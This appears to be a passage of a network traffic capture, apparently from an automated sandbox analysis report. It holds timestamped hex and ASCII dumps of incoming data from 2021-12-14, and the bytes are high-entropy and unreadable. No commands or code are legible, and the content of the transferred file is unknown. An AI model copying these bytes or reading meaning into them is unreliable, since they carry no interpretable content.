                                                          2021-12-14 13:10:57 UTC145INData Raw: 29 d2 46 99 4a 12 58 96 fc ca 2f 70 81 eb c7 dc 7b 3f 58 11 17 75 e2 91 68 fd 8a 63 e0 5d 3a b5 4f 9e df 11 67 14 d9 d3 63 5c 0e 0c 7d e3 e4 1a 00 7f 8f 1d 18 9b 72 92 f9 7c a9 6d 20 4e c8 bf 11 d8 d5 fe e1 27 59 31 e1 21 56 b2 ea 4c 7e 3b 72 ce 77 06 6f 4b 0e cd a9 98 5f dc 7b b8 3e 83 98 6b c9 9c 41 d2 9b ca 55 7d 3e c3 85 04 b8 e0 5d f5 35 f4 3d e6 80 b4 34 0b 87 19 f7 ea c5 77 e0 8d 02 05 d4 7e e7 bf 64 44 0f 2c 6e 44 04 d9 5d 05 52 06 82 f5 cc ec 47 75 73 f0 c4 3a 33 c8 8a c2 b6 69 99 c0 e4 a8 90 65 76 0d 5b c9 5c 2f a0 3d 5b f6 31 dc 5f a4 e6 b4 a5 c2 a2 a7 c0 88 39 8a 5d 63 b4 4b b1 ee 8a 03 fe f4 36 d3 62 c6 92 d6 64 f4 23 f1 6a 16 08 0f cd 31 dd 81 c8 0d 97 eb b4 05 d2 2b 8e 46 56 83 ef 48 da 2c 7b 2e 06 5c 5f 97 b5 40 17 10 aa 18 56 72 3a a1 d0
                                                          Data Ascii: )FJX/p{?Xuhc]:Ogc\}r|m N'Y1!VL~;rwoK_{>kAU}>]5=4w~dD,nD]RGus:3iev[\/=[1_9]cK6bd#j1+FVH,{.\_@Vr:
                                                          2021-12-14 13:10:57 UTC147INData Raw: e8 66 0b 79 07 12 cc 13 7e 75 72 1d 64 1d 79 38 20 d6 26 10 93 70 d0 61 9f a5 b6 ca 27 cc 14 bd 6c 38 75 e4 8e eb 8d 04 c0 81 a1 d2 a8 2d ad 89 ea 8a ac d7 ff 29 a6 34 ae 34 b3 55 41 a4 1a 75 73 cc e1 13 88 af 16 0a dd 2e ac f2 07 89 30 09 48 4f b3 98 a1 1c 35 aa 14 1c a0 0f 5a 0c 3f 8c ce bd b5 b9 98 1f 77 13 d8 1b af 23 3f 03 b6 1e 93 c0 0a f8 e0 96 53 3f 29 dd c9 f8 77 51 dc ae 70 74 c1 83 40 49 20 c9 09 e0 0e 96 ea 3e 39 50 46 67 ee 9a 0f ee e8 59 08 43 6c 30 0e 3f c6 68 58 25 59 6e 35 f0 0a 34 87 d6 ae fe d9 c6 95 31 c7 67 9e 67 31 3a 81 2f 3d 4f f6 2f 49 d8 cd c6 3e fa cf b7 26 fe b9 02 db fc f9 09 7f 0b 04 c0 4d 4a 79 e5 08 36 b6 eb 06 bc 23 40 b0 d0 7d 07 38 bc f8 01 92 98 ad 04 1b 92 09 28 5c eb b4 38 c5 04 1b 16 82 9a 52 6b 0c 1d 9b f9 1c e4 f7
                                                          Data Ascii: fy~urdy8 &pa'l8u-)44UAus.0HO5Z?w#?S?)wQpt@I >9PFgYCl0?hX%Yn541gg1:/=O/I>&MJy6#@}8(\8Rk
                                                          2021-12-14 13:10:57 UTC148INData Raw: 64 97 df 8d 7d e8 23 fa c6 16 fc 7c d5 16 8f 18 e2 95 59 33 c8 a3 24 e6 d4 71 9c 9b ef f3 04 a2 ba 59 66 02 e9 6a 9b 4a 3c 5f 12 82 55 04 f2 fb 52 b0 de 7f 1f 07 36 3a 67 5e 94 33 ee ac 43 05 4a 1f b5 6f 01 e6 39 4a 08 f1 f8 4b da 76 bf fa 9d 79 3b 77 79 af db 80 be 5f 1a fa 71 cc 49 00 88 ea 9a 34 f8 5d c8 c0 0f 6b 6a c9 0a 7e 34 92 ff fd 45 ef ef 0f 00 4f 8c 96 e8 84 10 5c d1 12 9c 1e 44 ba 2d ec bc a0 e4 92 e2 66 57 13 c7 af 84 ec fb 22 6c 30 d4 40 c4 48 b6 ae 2e 30 2e fc db 9a 55 28 8f 22 4a d1 97 ce a0 45 70 0a 03 6c 42 28 75 a5 e2 ca 07 86 d1 96 27 45 75 e9 4f cc 05 07 ce d0 09 b4 69 b9 90 2e 81 90 7a 41 2c 5e e6 5e 29 8c 95 a3 11 a9 dd 5b 80 bd 7c a7 c2 38 18 c8 b4 0d 8c 06 ab b6 4b 91 56 57 2a fe e3 01 c0 48 eb 96 fc e0 a0 3c 8e f3 13 28 77 ef fa
                                                          Data Ascii: d}#|Y3$qYfjJ<_UR6:g^3CJo9JKvy;wy_qI4]kj~4EO\D-fW"l0@H.0.U("JEplB(u'EuOi.zA,^^)[|8KVW*H<(w
                                                          2021-12-14 13:10:57 UTC149INData Raw: ad ca 1b d3 78 bc 3f dd ce f0 94 56 9e c4 b1 d6 17 a0 cb 83 54 ca f4 bb 3b 71 56 1e 4d 90 44 fb 3a ff 86 e4 68 06 90 05 14 e6 b1 0a c0 73 1d 7f 2f cc 17 22 d6 ba 1f 3c 1f 6f 40 02 a3 96 26 05 0d 32 27 49 02 4c ef ac 07 89 2e 42 df 24 ff a8 29 9a 3f c5 88 ac 4b f0 86 c9 8b 8f aa b5 75 ac 86 d8 53 e9 e9 d1 2a 83 8d fb 0e f7 ac f2 76 2a 89 34 35 ff 60 b1 98 3d 13 9a c5 ab 3d 3f 09 7a e2 1d 45 e8 27 90 88 a1 14 55 fd dc 31 2d 7d 85 2e b6 1a ae 48 25 fa e0 0a 5c 90 46 62 e8 58 71 71 33 8c bf 52 5b a6 76 70 2b eb e6 e4 24 10 b4 8d 14 50 42 59 67 b5 0d ee 74 56 a7 2f d3 11 af 39 e6 98 7a f1 7f f4 10 c2 38 3a 8a 24 ac f8 f3 60 d9 84 c6 67 82 6f be 3a 81 29 8d e8 a5 a4 6e f8 6b e4 cf f8 ef 40 9a db 94 0c f6 f4 25 09 7f 0d 0e 72 1f d3 78 fe 24 3b 17 e9 00 96 3b 1b
                                                          Data Ascii: x?VT;qVMD:hs/"<o@&2'IL.B$)?KuS*v*45`==?zE'U1-}.H%\FbXqq3R[vp+$PBYgtV/9z8:$`go:)nk@%rx$;;
                                                          2021-12-14 13:10:57 UTC150INData Raw: ea 1d 35 7d 05 e9 25 d1 14 9a eb 4c 0c 14 18 38 32 7a 25 4e 6d cc 1e ad 83 98 90 47 bd d8 15 f2 37 11 51 67 97 c7 3f 75 c7 31 da cc 96 81 e5 d4 36 0f 16 26 97 46 2e 7a ab 0b f3 f4 7b de e7 76 f2 24 cb b2 4a 65 22 fa f1 be 67 06 54 30 91 50 2e 70 a5 6a 9f de 7b 20 ce 1c 17 65 c4 b7 34 ff 89 53 c4 48 4a b5 4f 81 c4 38 4a 07 f9 c1 4a da 70 18 69 e3 e0 3b f7 e4 8e 1d 86 9e f2 ae df 5c 53 44 20 4e e9 bf e4 4f d4 e1 c4 27 86 31 e1 2d fc ac 95 d5 7b 2d 7c c5 14 7a f7 4a 94 ec 82 f4 e1 fd 03 be 38 12 be 4c cc 36 41 cd 92 83 aa e3 38 d2 f7 88 c0 07 c4 f4 31 d0 ca 8d 7e b0 83 f7 80 0b d1 ca 24 ee 31 5d f5 9c 70 9e 08 2e 81 a9 a4 c1 82 dd f9 89 a1 56 9e c0 43 11 7d 02 ba 89 00 06 39 c2 d7 2b 27 24 55 b9 46 4e 7f 49 62 c5 e4 ca 80 70 89 d0 78 43 d8 84 e0 24 a7 70 79
                                                          Data Ascii: 5}%L82z%NmG7Qg?u16&F.z{v$Je"gT0P.pj{ e4SHJO8JJpi;\SD NO'1-{-|zJ8L6A81~$1]p.VC}9+'$UFNIbpxC$py
                                                          2021-12-14 13:10:57 UTC152INData Raw: 3b cc 6e 8b f0 16 12 a0 a9 25 7b f6 21 30 22 a4 a1 4b 8f 4e 1e 32 c2 1d 60 3f 95 ab 23 3a 73 58 2b d4 5b 08 79 8b 51 63 2c 89 7d 5a 64 fb 11 db d5 dd bd 61 ef a5 c4 2f 06 c8 55 6b 3e 0d 6f f0 f0 38 af ef 87 f5 a3 2f 7c 39 40 7d b9 e9 6d 97 5d 56 0d 44 87 72 4f ba df 46 db 2f 83 37 7f ca c9 89 4e 63 45 dc 5c 7a 2a aa f9 bf 8c 2c 4d f9 17 d1 ad 23 80 28 dd 98 af 58 9e 25 ac 1d 97 91 bd 4b 4b 9c e8 52 62 cb ef 1f be be 28 30 de 97 f9 78 08 b6 17 1c f2 21 b7 ad 10 0b 31 85 18 39 34 21 63 23 6d 52 d9 98 82 b1 81 09 ab fa 04 f7 f4 81 6f dd 57 dc 7d b5 ec 2d 2b de bf cc f2 1e 02 94 ac 9e 4e 79 6e 97 16 77 87 b1 e3 2f f5 2c c2 fa 7c 45 ce 8f 97 b5 ac 6d ab 2f 89 93 dc 87 a6 ed 5a d4 21 96 a7 12 8b 90 d5 0f ae ab 17 4e 25 65 3f e9 68 3f 47 d5 0c d5 03 b3 12 bf 0c
                                                          Data Ascii: ;n%{!0"KN2`?#:sX+[yQc,}Zda/Uk>o8/|9@}m]VDrOF/7NcE\z*,M#(X%KKRb(0x!194!c#mRoW}-+Nynw/,|Em/Z!N%e?h?G
                                                          2021-12-14 13:10:57 UTC153INData Raw: 88 73 b6 3b 85 73 3c 70 a5 6b 33 5a 7d 01 1e d7 b2 f9 2e 7b 39 4d 32 4a f6 d9 08 f0 cf 9c 0e c6 1f 00 c7 b8 4b 60 31 86 91 58 93 60 fa f4 5d 1e 12 3f 09 48 46 18 7b 47 91 68 e2 cc e1 85 ee a4 28 7d 82 08 17 3e 13 e0 ad 9a 2f 98 5d 80 8e a8 b6 d1 f0 33 83 32 78 c8 15 62 45 ae 38 d3 ef 0c 11 98 e4 f8 2a 8a d6 46 77 33 f2 36 8a 56 08 6c 14 c8 05 78 0a fe e1 99 a6 02 51 b1 0d 2e 4e eb 8a 65 94 a9 56 f5 64 78 d7 76 b2 fc 1f 39 25 e7 ef 71 fc 18 1d f4 7b 79 f6 b9 e7 14 9d 1f 65 bd 67 28 ab 37 9a d8 bd 2c 18 a4 02 07 3d 07 81 f9 e3 39 fd bd 9e 7c 32 9a da 8b 5f a0 a5 dc fb 77 0f 35 38 de 58 be 57 c6 6f 55 8a 4d 21 b4 32 6d 00 d1 d7 cd 40 2a 1e 0f f4 dc 75 b3 44 9a 26 42 62 79 a8 2e c7 1c 10 7b ad 7b 10 ad ca 39 b2 39 30 dd f6 a3 da 99 ec 88 ff 98 70 fd ab 29 7a
                                                          Data Ascii: s;s<pk3Z}.{9M2JK`1X`]?HF{Gh(}>/]32xbE8*Fw36VlxQ.NeVdxv9%q{yeg(7,=9|2_w58XWoUM!2m@*uD&Bby.{{990p)z
                                                          2021-12-14 13:10:57 UTC154INData Raw: f0 44 ad c3 92 cd 5e a4 4c 00 aa 9d d9 45 64 97 55 a8 cc ce ab 79 91 0d 92 78 14 82 94 bf 27 a2 ea e9 e5 fd 69 ac 38 42 f7 d6 72 44 80 82 5a c2 e5 ba 30 48 98 4f 95 98 e5 2c 8a a1 c7 72 43 84 b2 c7 fa 95 60 d5 85 84 79 ef c7 a6 67 ab 9c 37 ae 47 96 c3 a0 f9 67 87 c4 82 6f 03 e0 12 40 45 11 7b e7 d5 2b 95 ed 91 ae de 65 08 48 39 3f f0 bf 3a c2 4f 0c 5b 1f da 01 12 de ae f0 7a ae 33 8a f1 48 73 1a cb c0 f6 47 9e f8 9d 01 17 17 53 e4 9c 1f b6 57 2b da 54 d3 30 53 7c 9b 12 e4 4c f3 6c 43 60 82 b1 61 2b f5 b0 29 0d c0 67 54 e1 f6 0d 48 1c ab c2 78 d7 da 60 90 54 1d be 93 83 34 ab b5 f2 ad cb 83 89 d0 6a 2b 0c 16 39 a3 e8 84 54 a0 8c fa 26 97 35 cc 00 f5 89 53 68 ab d0 b0 b9 58 52 f5 f3 e1 74 2b 58 c6 76 30 f6 d8 b7 6c f6 78 8b ad 30 04 8c f4 d6 fc f9 f1 4b a5
                                                          Data Ascii: D^LEdUyx'i8BrDZ0HO,rC`yg7Ggo@E{+eH9?:O[z3HsGSW+T0S|LlC`a+)gTHx`T4j+9T&5ShXRt+Xv0lx0K
                                                          2021-12-14 13:10:57 UTC155INData Raw: f7 9c 83 bd 75 33 bb 38 8c 6d 61 96 70 87 e8 b9 98 60 8f 70 1d a2 51 0f 4f fb 2b 52 0f 6b 48 95 87 e3 02 5a dd 4a d5 1c d2 90 d2 45 90 ca b3 de 95 ba 31 53 13 d1 d9 42 35 5d 04 d3 80 1a a1 83 9f 06 d0 08 63 a4 83 7a 4b 02 e3 b1 67 b0 42 cb 8c 25 78 61 52 34 74 13 4b 3e 1c 89 51 cc 80 ac 84 f3 fa 75 f7 3d eb ca 88 b8 54 1f 75 90 2f c7 36 2e 4d 42 31 1b de 7b e2 fc 45 90 e8 95 4f fd 29 20 88 88 7d 10 0b fd 20 7e be 8a c7 1c b8 73 a8 e3 b7 e0 6c a0 d3 87 6f 3d 4e 22 9d c3 20 e0 c0 95 3d 41 9a 60 2b cf 01 e2 97 3f c8 36 56 a8 c9 a7 5c 5c c6 44 d4 2f ed 71 71 a8 eb ae 39 85 18 2c d8 29 54 e7 66 ca 8b dd 65 27 86 77 70 00 47 b8 c0 9a 52 9f c5 99 23 65 cd c6 f7 48 af a5 d6 ee 34 61 de cd 24 a1 44 f9 3c cb e2 6b 90 fc 17 9a da a2 62 07 69 91 e1 c8 8e 21 1c 9a 51
                                                          Data Ascii: u38map`pQO+RkHZJE1SB5]czKgB%xaR4tK>Qu=Tu/6.MB1{EO) } ~slo=N" =A`+?6V\\D/qq9,)Tfe'wpGR#eH4a$D<kbi!Q
                                                          2021-12-14 13:10:57 UTC157INData Raw: 2d 19 af 89 02 65 9a b5 49 c0 88 1c 64 90 28 ec 11 60 6f b8 5c 02 e5 f1 20 aa 81 8a 52 4a d8 84 4b 1d 4d ff 4a c0 8a df 98 46 bd 05 30 dd b3 d2 4e 76 c5 39 85 ba 91 d2 0c e6 6f e0 11 2f e4 de fc 6e b8 9c 8d 80 9c 06 d2 07 67 90 5b e9 cd 52 16 d0 4c 47 59 c1 cd 1a d9 1b 73 1b 94 73 18 51 c0 c6 52 65 19 34 43 f2 31 71 05 e4 1c 43 5f da 3f 00 dd 40 b1 7e 3e 53 0c ce 43 3c 69 80 a6 60 92 dd 80 a3 90 66 67 a7 1b 52 3c 00 20 ed a1 e1 9d c5 36 53 aa 60 e0 88 b8 e0 3c 8f b5 5f 30 f2 7c b1 5a d3 82 20 78 07 a4 89 a3 3a 98 d8 ba 55 31 41 35 dd bc 6c 99 61 1d ce 2c bc 51 3e 10 fd 6a bc 56 ed 3e 18 12 e1 a1 67 2e b8 65 c8 84 73 f8 f1 04 1d 85 ee 81 39 1e e8 79 60 88 2c e2 cd 69 67 77 c9 46 5b 58 7d 3e 7e 77 2c af d7 cf d8 d7 53 59 4e ae 5b 46 2e d9 69 ee 43 fe 12 7e
                                                          Data Ascii: -eId(`o\ RJKMJF0Nv9o/ng[RLGYssQRe4C1qC_?@~>SC<i`fgR< 6S`<_0|Z x:U1A5la,Q>jV>g.es9y`,igwF[X}>~w,SYN[F.iC~
                                                          2021-12-14 13:10:57 UTC158INData Raw: 71 9f 68 c7 0a cf ac be ce e3 06 72 c9 88 5f 08 8e b3 df 0b 5b ae b1 b5 f9 7d 35 eb 29 aa 8e c8 83 22 ce 92 9c f2 cd 25 62 e9 60 c7 32 48 b2 28 be bc 97 c9 ca 4b a9 a0 68 9b c4 89 4a ed 97 d9 bb 95 24 09 75 9f cf 21 b5 78 ed 1b 5a 0c 93 41 1d 68 42 6f 4e d7 b7 eb 25 2a af d5 bf bf 6b 35 a8 1e 3f 26 87 46 bd e5 61 26 e3 dc ce 50 1d fa 36 ca 5b 01 d1 c9 bf 97 ff 89 ec b2 b3 93 04 86 21 01 38 3e 4f 70 f2 a8 55 93 8e eb c4 36 72 1a f2 42 82 5a 63 1d 16 7f 75 bf 33 82 85 26 fc ae c6 28 a0 77 5a fe f3 1c 73 1e a4 41 25 fe c2 9a 42 db 3c db 5f 2d 59 ef 14 73 1a c7 85 f6 9b 28 37 89 63 6b 01 b2 e8 4e ad d7 30 85 54 45 eb 17 f6 9b 6e 10 69 bc a9 13 99 2b c9 22 84 91 4c 13 09 c5 78 ee c8 05 fc a2 30 a4 00 4e 0c 9a f9 56 99 a6 b7 b0 06 74 22 a9 15 47 2a 90 db 70 32
                                                          Data Ascii: qhr_[}5)"%b`2H(KhJ$u!xZAhBoN%*k5?&Fa&P6[!8>OpU6rBZcu3&(wZsA%B<_-Ys(7ckN0TEni+"Lx0NVt"G*p2
                                                          2021-12-14 13:10:57 UTC159INData Raw: 81 1b 31 73 3b c2 39 e9 dd 67 42 f8 ec f6 11 da 53 42 e9 d0 1a 7d 98 ee 1e 68 77 64 28 45 b3 3b b0 d0 1b 84 b7 35 0f 88 f7 16 22 d5 6c 2d b6 af 64 d0 08 fb b6 96 7b bc f7 27 40 ee 05 4f 46 9f 82 3e 7b 8a c9 89 29 96 3e 61 37 58 97 7f ba da 04 62 1a 9d 95 79 c3 64 74 41 16 c6 5e c0 47 8e b7 75 7c 42 c9 71 39 2d 27 2d 85 56 8e fd 1d 17 9b a0 38 77 be 2e 0e 39 93 a9 68 8b 44 13 60 dd 09 61 2b 9b 9f 06 36 25 76 3e c9 6a 28 6c 89 7a 2d 12 90 77 53 ac 0b c4 27 62 1c 59 7f e5 b3 cd 23 10 d1 60 6a 36 26 76 e7 d0 12 88 d4 a2 c0 a0 16 6d 30 5b 54 b0 fd 65 b3 23 4c 27 61 a1 71 75 8b d6 4b c5 06 87 15 71 c8 dc 9b 6e 63 5b c4 23 7f 01 85 e3 96 ff 4c 32 84 69 ae d1 26 95 57 f9 dc f5 08 eb 13 a2 1c 8c ec b4 47 46 9f ff 7e 66 c6 f1 26 8e 91 26 20 f3 b6 d1 6d 12 b5 11 02
                                                          Data Ascii: 1s;9gBSB}hwd(E;5"l-d{'@OF>{)>a7XbydtA^Gu|Bq9-'-V8w.9hD`a+6%v>j(lz-wS'bY#`j6&vm0[Te#L'aquKqnc[#L2i&WGF~f&& m
                                                          2021-12-14 13:10:57 UTC161INData Raw: ad 20 aa c0 40 2f 0a 0f 31 4c 8b c4 aa a1 3f 06 7e 15 b3 ec 53 d6 29 25 6f 79 e7 14 83 94 14 4f 46 9d b1 83 58 a0 0a cb 35 66 59 08 26 f4 94 2c 42 ab f9 7d 41 10 ce ad 40 41 54 0b 81 f7 2d ef 62 49 27 4d c7 49 0b 48 03 24 c4 a0 08 85 3b d6 a3 53 d7 0e 3c 14 54 af 2c cb dc 02 fc b5 fc 74 c7 bf ec 9c ef 76 54 1c da bc 78 ed 3a 92 69 03 79 c0 24 66 04 20 2c 1f 9d e6 87 6b 6e f5 9f ec be 78 1b 86 87 86 96 48 c9 0d 41 9b ba 58 35 2f cd 8f 43 93 7c 8c c8 32 5d 59 69 03 40 3d 56 01 28 b0 62 f6 ec f1 f0 b1 9e 3a 79 8d 45 47 33 45 a0 cd ab 16 9f 56 90 87 f5 f1 a9 a6 76 ec 08 0e b1 7b 16 4a e6 21 f4 f4 54 5e 90 c3 e4 33 c7 96 51 75 2f fc 70 94 5b 02 62 4f cf 23 56 71 80 d4 a6 da 6b 2b ed 12 1d 40 aa cf 5f b8 8d 58 f4 46 0b a2 64 b6 e1 42 73 3a f3 e5 18 8d 4a a7 5f
                                                          Data Ascii: @/1L?~S)%oyOFX5fY&,B}A@AT-bI'MIH$;S<T,tvTx:iy$f ,knxHAX5/C|2]Yi@=V(b:yEG3EVv{J!T^3Qu/p[bO#Vqk+@_XFdBs:J_
                                                          2021-12-14 13:10:57 UTC162INData Raw: 37 a5 da f0 a5 29 f2 09 df 34 f5 5e 22 7a 9f 3a d7 78 9a 36 41 08 98 2d f1 a2 df ec b2 8a df 37 35 fa e5 5c c4 85 d4 85 07 f3 22 58 a9 d4 76 79 67 8e 52 cb 9e 36 26 f8 8a 49 3b de f4 dd c4 77 11 ed 75 f7 bb 4f f9 df 43 61 c7 84 40 64 a7 21 54 c5 d8 35 cd 64 a8 fd fe 0d fc a5 65 68 fe 6a 11 11 cd 9e 42 2c ff a5 cf 51 fc 55 d0 98 d7 29 e6 50 5d b7 df b8 26 11 f6 5e ed c6 c7 ac 75 80 24 99 6e 55 af b0 d9 2f 91 c3 d4 dd fd 7b ba 25 39 f4 c1 5d 57 c4 98 6f c8 f4 f6 4a 4d 99 4c 97 de e0 1d d0 b8 f3 47 74
                                                          Data Ascii: 7)4^"z:x6A-75\"XvygR6&I;wuOCa@d!T5dehjB,QU)P]&^u$nU/{%9]WoJMLGt
                                                          2021-12-14 13:10:57 UTC162INData Raw: e9 d1 fe a5 8e 6d d7 8c d8 26 f6 9e b0 2f f0 e0 0f bd 5e af d8 b7 e3 30 91 d5 90 6f 7d 95 3b 2e 69 51 64 92 bb 6c dc 9c fa 90 c9 2d 29 59 2e 39 8e 9b 25 c0 45 07 5b 07 d5 10 12 ff ad 09 80 56 c9 71 23 80 7d 15 c6 cb f2 5f a1 eb 93 29 40 23 48 e7 92 74 c3 0b 73 ff 46 c6 20 44 30 bf 18 d6 69 cc 4c 76 55 b9 9a 6e 39 ac 9a 0c 1f d1 49 6f fc e2 16 47 3c de d3 71 c3 da 65 9d 40 62 c7 e9 ea 48 d4 cc a6 95 89 8c 9f cc 6b 11 34 25 3f a6 fd 80 79 bb b9 c0 37 9c 3d 97 2e e9 93 64 7e d6 e1 86 af 61 56 fd c9 d6 73 2c 16 de 60 23 f4 d5 a5 78 8e 4c 90 ad 25 19 93 fd ff ee f4 24 b1 14 d1 d8 94 f6 0e 5a ea 71 a9 24 37 b3 28 23 61 8d 60 55 e8 98 f3 b6 b9 18 a1 fe 95 34 83 04 c2 7a c4 6f fc 2d b5 46 15 9e 17 a2 56 92 9f 0d 61 92 da 1d d0 d4 96 58 35 4f 2f 46 32 d3 78 e5 0c
                                                          Data Ascii: m&/^0o};.iQdl-)Y.9%E[Vq#}_)@#HtsF D0iLvUn9IoG<qe@bHk4%?y7=.d~aVs,`#xL%$Zq$7(#a`U4zo-FVaX5O/F2x
                                                          2021-12-14 13:10:57 UTC163INData Raw: c4 d9 80 93 62 2a d9 fb 84 3f 52 ac ca 08 ae 38 95 c9 49 0c fb 22 70 2f 7c 25 b6 52 50 29 a9 83 58 bb ee f0 47 14 dd 13 66 47 62 97 13 a5 e4 f0 29 fc ec ac 10 e2 de 16 17 31 b4 90 53 33 fb b2 ad d5 e0 51 58 86 ed d8 36 cf 51 7d 64 09 e8 6b 05 60 35 5f 02 82 21 1d 72 ae d9 b1 d6 53 3d e9 32 3a 77 db 05 04 f9 8a d7 de fc 05 b3 4f db c0 8d 50 04 d9 40 54 20 78 87 7c d2 f0 c0 7f 06 8d d4 9f be 5f 86 df 8b ca 2c 10 48 e8 66 15 f7 e6 f7 c0 51 45 e6 c9 21 7c a1 84 61 65 2d 76 5a 27 d1 47 5d 94 df 8f 5f 51 fa 03 36 2e 37 a2 2b ec 8d 6f 79 88 e4 78 1b 29 71 b5 84 c6 f2 50 99 2c d2 44 ee 92 00 b4 25 a8 03 cf ca bc da e2 99 07 4a f1 6c e7 5a 50 6f 0b 3c 6e eb 33 5c 0a 8e 53 bf 9b d6 9f fc 47 46 c8 d6 c0 3a 15 f1 e0 c3 9f 63 b9 ae ef 3a 97 70 5e b7 7a 59 5b 3b 8a 1a
                                                          Data Ascii: b*?R8I"p/|%RP)XGfGb)1S3QX6Q}dk`5_!rS=2:wOP@T x|_,HfQE!|ae-vZ'G]_Q6.7+oyx)qP,D%JlZPo<n3\SGF:c:p^zY[;
                                                          2021-12-14 13:10:57 UTC165INData Raw: ed c4 5f c4 96 8d 28 99 85 c0 00 63 97 be e4 3a b7 fd 3e af 5c 9e 8d 3a e0 30 e0 b4 46 41 ae c9 fe 20 c6 8b 3b c5 f8 97 63 db 92 df 3d f3 e3 bc f0 dd 60 0c b4 57 9e db 78 ff 3a a2 ba 87 af 4c 04 23 38 71 52 3e e8 91 44 fb bd da 7c f6 c0 27 79 07 14 e6 06 01 ec 73 94 63 ea e4 aa 21 d4 bc 31 be 73 f1 41 02 ba b6 1d 07 9e 33 bf 6c 2f 5d d4 9b eb 8b 33 42 28 38 44 a9 8b 8d 17 e8 f2 af 4d da 04 b7 c5 8e 34 b0 57 41 84 d8 14 64 cc fc 26 a5 7a 16 93 f6 ae d2 6b 06 2b 37 29 d7 50 b3 47 3b 8b 19 be 32 3c 3f ca 4d 0c 1f 58 e8 5e b5 11 b1 37 75 13 de dd 2e 5d a6 1f b6 f4 b3 d9 09 fa e1 0c 76 da 21 fb e9 59 77 bf dc 35 be 50 c0 83 5b 77 09 cb 09 e7 26 e2 94 1c 39 52 43 47 4f 9b 14 ee 72 7d 27 a7 4a ab ae 3f c7 68 78 b1 7b 6e 35 ee 2b e6 aa 6f af fa f3 40 eb 7e d9 67
                                                          Data Ascii: _(c:>\:0FA ;c=`Wx:L#8qR>D|'ysc!1sA3l/]3B(8DM4WAd&zk+7)PG;2<?MX^7u.]v!Yw5P[w&9RCGOr}'J?hx{n5+o@~g
                                                          2021-12-14 13:10:57 UTC166INData Raw: 25 4e 61 d3 70 b7 ad 3d c1 52 b0 1b 1b 96 da 46 c0 e7 68 82 b1 af 33 59 01 c6 d4 52 76 42 d8 83 c3 59 d0 cf c9 43 88 4d 12 d0 e8 1c 34 7d 87 e6 18 c1 33 ba 6d 49 99 09 39 5f ba 66 bd 4c 71 e4 ec b3 16 83 bb c1 74 6b 04 f0 32 31 9d 4e 87 c5 a4 50 29 0c ec ee 85 82 77 f7 06 89 39 26 0a 54 23 50 87 09 0b ff 41 5a 98 ef 1c 2d df 90 58 66 6b d7 66 99 4b 14 f5 18 8f 51 2f 70 bf ff a2 dc 7a 3f 0e 21 37 65 c5 b1 2d e1 87 61 c1 48 be ba 5c 83 ce 39 f9 37 92 d7 48 da 55 89 6c e1 e1 3a 1e 73 99 03 84 b8 c7 86 cc 5e 88 ef b7 4f a8 84 62 58 c7 e6 80 11 22 b3 25 26 3c 2a c2 55 37 3c 36 f0 09 02 f7 4d 87 ea d2 0a ee fd 47 a4 68 03 aa 2a a8 82 47 cb 0a e4 6b 7d 68 45 38 83 8e 67 0a 75 23 d3 0c fa d6 34 6a 2f e2 15 87 4a f4 72 a8 93 74 ca 07 7f af be 43 6a ba 28 7d 40 78
                                                          Data Ascii: %Nap=RFh3YRvBYCM4}3mI9_fLqtk21NP)w9&T#PAZ-XfkfKQ/pz?!7e-aH\97HUl:s^ObX"%&<*U7<6MGh*Gk}hE8gu#4j/JrtCj(}@x
                                                          2021-12-14 13:10:57 UTC167INData Raw: 67 6d d1 95 10 06 5e e5 03 e8 9c df 8a 43 30 10 20 d9 8b ee e3 50 ef 12 a0 8b 28 f0 37 d7 0f 4a ac 0c e6 db 91 df d6 90 9a b1 cf 84 05 03 76 bb e8 84 64 b0 e8 0f f9 1a 68 0d 2e c7 67 60 7d d6 55 82 9f 0f 4a 09 9e 99 92 73 61 6a ce ac 8e bd 6f 90 ab 13 8b 6e 3c ab 43 b2 8d 3c 38 38 b7 e7 d3 fe 35 9e 37 16 27 d2 ce a4 87 68 ad 20 07 be e3 62 70 fb 1d 17 f3 bd 06 ea eb 1b 73 3f b2 ba b7 d7 8f 19 e8 e1 e4 46 31 8b e0 4a c3 0c 01 91 3a af 15 ce bf c7 dd ae b4 fe 0b ff fe a9 44 10 db a6 fa cd b2 06 84 3e d8 2a 46 5c 72 a8 de 53 e4 cd 6c 26 a3 ad 81 0d c5 ae d4 6b 14 8e 06 2b d1 4d 77 99 09 3b 1e bb 7a 3b 0d 0f 5c 0c e9 44 da bf b3 a5 27 33 0b 0c d8 31 ba 5c 9f 00 b0 1a a1 67 31 fa e6 0c bf 15 0a f9 ef 58 e2 50 4c 93 b9 52 56 82 69 63 0b cb 1b e1 16 12 92 a7 fc
                                                          Data Ascii: gm^C0 P(7Jvdh.g`}UJsajon<C<8857'h bps?F1J:D>*F\rSl&k+Mw;z;\D'31\g1XPLRVic
                                                          2021-12-14 13:10:57 UTC168INData Raw: 1b 84 3c c6 0a 4a cf 87 ed 84 a5 4d 8e 85 19 8f a6 2e 17 48 a5 a9 80 d8 25 a6 c6 41 9e 5e b4 69 74 08 74 28 4c 60 d3 f8 1a 72 31 e0 c5 9c ea cc 87 db 46 96 cc b7 1f b0 be 10 c5 0d 1b dd 5e 2a 4e 48 9e c2 d9 e1 d3 f9 d6 88 a8 11 d3 fb 1e 35 7d 9f 4c 08 d5 12 2d fb a4 04 18 38 5f 1c 7a 25 d1 70 f2 13 38 82 64 b2 cf c3 41 14 f2 33 b1 43 72 b7 50 a4 54 e3 33 fc ec 84 82 e5 54 16 9d 18 b1 96 52 3a 42 86 09 f3 f2 51 d8 99 f9 d3 b3 ce 82 50 76 22 46 35 9b 4a 14 72 01 82 41 29 d7 8d da b1 7a 24 3f c2 34 3a 76 c4 6c 0b 19 88 72 c0 18 7f b5 4f 81 cf 28 4a 0c da 33 4b cb 70 95 1d e3 e0 3a 77 6c 8f fd 94 38 5f 91 df c0 bc 6f 20 4e e8 8b 34 96 d6 88 c9 1e 74 17 82 27 7c 34 94 c4 7f 26 61 87 06 15 6f 93 f7 e8 84 8a 79 ed 03 2d 3f 05 b1 3c ec 18 2a cd 92 e2 78 6e 3e 52
                                                          Data Ascii: <JM.H%A^itt(L`r1F^*NH5}L-8_z%p8dA3CrPT3TR:BQPv"F5JrA)z$?4:vlrO(J3Kp:wl8_o N4t'|4&aoy-?<*xn>R
